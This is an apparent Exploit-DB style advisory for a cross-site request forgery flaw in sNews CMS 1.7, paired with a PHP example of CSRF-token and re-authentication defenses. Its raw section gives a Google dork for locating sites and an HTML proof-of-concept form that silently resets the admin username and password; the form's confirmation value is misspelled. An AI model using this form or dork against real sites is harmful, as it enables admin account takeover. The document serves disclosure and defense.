Vendor: sNews
By: Ashiyane Digital Security Team
CVSS: 8.8 (HIGH)
CWE: 352 (Cross Site Request Forgery)
Product Name: sNews
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:snewscms:snews
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2016

Snews CMS Cross Site Request Forgery

This exploit allows an attacker to change the username and password of the admin without needing the old username and password. The attacker can craft a malicious HTML page with a form containing the new username and password and submit it to the vulnerable website. This will change the admin credentials to the ones specified by the attacker.

Mitigation:

Implement a CSRF token in the form to verify the authenticity of the request.
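
One way to apply this mitigation in PHP, shown as an added example that is not sNews code or part of the original advisory. The csrf_token and current_pass field names and all function names are hypothetical; uname, pass1 and pass2 are the fields from the PoC form. The current-password check is an extra assumption, added because the change request is accepted without the old credentials.

```php
<?php
declare(strict_types=1);
// Added example, not sNews code. csrf_token, current_pass and all function
// names are hypothetical; uname/pass1/pass2 are the fields from the PoC form.

function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit, per session
    }
    return $session['csrf_token'];
}

// Hidden field to render inside the credential-change form.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '" />';
}

function csrf_check(array $session, array $post): bool {
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return is_string($expected) && $expected !== '' && is_string($supplied)
        && hash_equals($expected, $supplied); // constant-time comparison
}

// Returns the HTTP status the credential-change handler should answer with.
function change_credentials(array $session, array $post, string $storedHash): int {
    if (!csrf_check($session, $post)) {
        return 403; // a cross-site form cannot read the session's token
    }
    $current = $post['current_pass'] ?? '';
    if (!is_string($current) || !password_verify($current, $storedHash)) {
        return 403; // re-authenticate before changing credentials
    }
    $new = $post['pass1'] ?? '';
    if (!is_string($new) || $new === '' || $new !== ($post['pass2'] ?? null)) {
        return 400; // new password missing or confirmation mismatch
    }
    return 200; // caller stores uname and password_hash($new, PASSWORD_DEFAULT)
}

// Constructed demo input: a POST without a token, then one from the real form.
$session = [];
$stored  = password_hash('old-secret', PASSWORD_DEFAULT);
$forged  = ['uname' => 'x', 'pass1' => 'x', 'pass2' => 'x', 'task' => 'changeup'];
$genuine = ['csrf_token' => csrf_token($session), 'current_pass' => 'old-secret'] + $forged;
var_dump(change_credentials($session, $forged, $stored));
var_dump(change_credentials($session, $genuine, $stored));
```

In a real handler the arguments would be $_SESSION, $_POST and the stored admin password hash, with the check applied only to POST requests.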

Exploit-DB raw data:

# Exploit Title : Snews CMS Cross Site Request Forgery
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date :  1/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
Change Username and Password of admin
We don't need old user name and old password
<html>
  <!-- CSRF PoC  -->
  <body>
    <form name="form0" action="http://localhost/?action=process&task=changeup" method="POST">
      <input type="hidden" name="uname" value="Attacker" /> <!-- new username -->
      <input type="hidden" name="pass1" value="Attacker" /> <!-- new password -->
      <input type="hidden" name="pass2" value="Atacker" /> <!-- repeat new password -->
      <input type="hidden" name="task" value="changeup" />
      <input type="submit" name="submit_pass" value="Save" />
    </form>
  </body>
</html>
####################################################
######### exploit by: Amir.ght #####################
####################################################